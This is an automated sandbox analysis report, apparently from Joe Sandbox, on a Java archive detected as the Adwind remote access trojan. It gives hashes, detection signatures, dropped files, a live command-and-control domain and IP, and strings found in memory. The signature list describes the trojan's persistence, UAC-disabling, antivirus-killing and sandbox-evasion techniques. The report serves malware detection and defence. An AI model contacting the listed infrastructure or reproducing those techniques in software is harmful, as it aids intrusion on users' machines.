Windows Analysis Report
NewOrder - P2D041197.jar

Overview

General Information

Sample name: NewOrder - P2D041197.jar
Analysis ID: 1427166
MD5: bc34f4e23dca52ed6425b46a3dcf5e95
SHA1: e82affa4fea489146e3deb803efdb561a394073f
SHA256: f77617921c5fb6f8114eca9fe330b8d2bfc3a99c4f581f3f9a8282a31d528aeb
Tags: Adwindjar

Detection

ADWIND
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected ADWIND Rat
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected AdWind RATs dll
Creates a Image File Execution Options (IFEO) Debugger entry
Creates an undocumented autostart registry key
Disable UAC(promptonsecuredesktop)
Disables UAC (registry)
Disables Windows system restore
Disables zone checking for all users
Excessive usage of taskkill to terminate processes
Exploit detected, runtime environment starts unknown processes
Java source code contains strings found in CrossRAT
Sigma detected: Adwind RAT / JRAT File Artifact
Sigma detected: Potential Attachment Manager Settings Associations Tamper
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Processes Spawned by Java.EXE
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Uses regedit.exe to modify the Windows registry
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Add executable type to lowriskfiletypes to avoid warning prompt
Binary contains a suspicious time stamp
Changes image file execution options
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
PE file contains sections with non-standard names
PE file does not import any functions
Queries the installed Java version
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Shell Process Spawned by Java.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Classification

AV Detection

Source: C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs Avira: detection malicious, Label: VBS/Antiav.jre
Source: C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs Avira: detection malicious, Label: VBS/Agent.281
Source: C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs Avira: detection malicious, Label: VBS/Agent.281
Source: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll Avira: detection malicious, Label: TR/Spy.Agent.lusda
Source: C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs Avira: detection malicious, Label: VBS/Antiav.jre
Source: pnauco5.ddns.net Virustotal: Detection: 5%
Source: https://jrat.io Virustotal: Detection: 6%
Source: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll ReversingLabs: Detection: 85%
Source: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll Virustotal: Detection: 79%
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\README.txt
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt

Software Vulnerabilities

Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\wscript.exe

Networking

Source: unknown DNS query: name: pnauco5.ddns.net
Source: global traffic TCP traffic: 192.168.2.4:49739 -> 103.151.123.225:5000
Source: Joe Sandbox View ASN Name: VNPT-AS-VN VIETNAM POSTS AND TELECOMMUNICATIONS GROUP VN
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown DNS traffic detected: queries for: pnauco5.ddns.net
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-only/
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-onlye/
Source: java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/namespace-growth
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtd
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtd:
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtdch:
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refs
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refsnterna7
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refss
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs/3
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/standard-uri-conformant
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/standard-uri-conformantom2
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validate-annotations
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validate-annotationsTextI;
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-trees
Source: java.exe, 00000007.00000002.2851354329.0000000015736000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-treesl
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-treesre1
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2851354329.0000000015736000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/dynamic
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/id-idref-checking
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/id-idref-checking/sun/F
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/id-idref-checkingl
Source: java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/identity-constraint-checking
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/identity-constraint-checkinges
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking=
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checkingin=
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psvi
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psviint
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/element-default
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/element-defaultO
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/ignore-xsi-type-until-elemdecl
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/ignore-xsi-type-until-elemdecl/A
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/ignore-xsi-type-until-elemdeclA
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-value
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-valueB
Source: javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-valuenternalB
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/unparsed-entity-checking
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/unparsed-entity-checkingn/org/B
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdef
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdef/xni/XD
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdefD
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdef
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdef:
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdefm/su:
Source: java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef/xerce
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris6
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language;
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-languager
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude1
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/D
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/dom/current-element-node
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/dom/current-element-node9
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/dom/document-class-name
Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/dom/document-class-name$
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/input-buffer-size
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/input-buffer-sizejava/l
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factory
